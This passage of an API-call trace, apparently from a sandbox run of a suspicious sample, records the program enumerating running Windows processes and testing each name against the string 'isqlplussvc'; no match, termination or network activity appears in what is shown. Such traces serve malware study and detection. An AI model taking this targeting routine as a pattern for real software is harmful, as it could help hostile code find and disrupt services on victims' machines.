WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.545] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3569048 [0093.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569048, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.545] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.545] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.545] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.546] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569168 [0093.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569168, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.546] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.546] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.546] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.547] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547908 [0093.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547908, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0093.547] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0093.547] StrStrIA (lpFirst="dwm.exe", lpSrch="isqlplussvc") returned 0x0 [0093.547] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.548] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569120 [0093.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569120, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.548] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.548] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.548] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.579] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569108 [0093.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569108, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.579] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.579] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.579] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.580] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569060 [0093.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569060, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.580] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.580] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.580] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.581] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35690a8 [0093.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35690a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.581] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.581] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.581] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.582] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569300 [0093.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569300, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.582] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.582] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.582] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.583] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35690c0 [0093.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35690c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.583] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.583] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.583] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.584] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35690d8 [0093.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35690d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.584] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.584] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.584] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.585] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35690f0 [0093.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35690f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.585] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.585] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.586] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.586] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569258 [0093.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569258, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.586] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.587] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.587] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.587] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569138 [0093.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.588] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.588] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.588] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.588] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569198 [0093.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3569198, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0093.589] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0093.589] StrStrIA (lpFirst="spoolsv.exe", lpSrch="isqlplussvc") returned 0x0 [0093.589] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.589] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35691e0 [0093.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35691e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.590] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.590] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.590] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.591] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35691c8 [0093.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35691c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0093.591] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0093.591] StrStrIA (lpFirst="audiodg.exe", lpSrch="isqlplussvc") returned 0x0 [0093.591] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0093.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.592] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569318 [0093.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3569318, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0093.592] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0093.592] StrStrIA (lpFirst="sihost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.592] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.593] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569210 [0093.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569210, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.593] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.593] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.593] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.594] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35691f8 [0093.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35691f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.594] StrStrIA (lpFirst="taskhostw.exe", lpSrch="isqlplussvc") returned 0x0 [0093.594] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.595] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569270 [0093.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3569270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0093.595] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0093.595] StrStrIA (lpFirst="explorer.exe", lpSrch="isqlplussvc") returned 0x0 [0093.595] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0093.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.597] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566c70 [0093.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3566c70, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0093.597] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0093.597] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="isqlplussvc") returned 0x0 [0093.597] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0093.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.598] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566a20 [0093.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3566a20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0093.598] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0093.598] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="isqlplussvc") returned 0x0 [0093.598] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0093.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.599] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566e50 [0093.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3566e50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0093.599] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0093.599] StrStrIA (lpFirst="Memory Compression", lpSrch="isqlplussvc") returned 0x0 [0093.599] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0093.600] WideCharToMultiByte (in: CodePage=0x0, 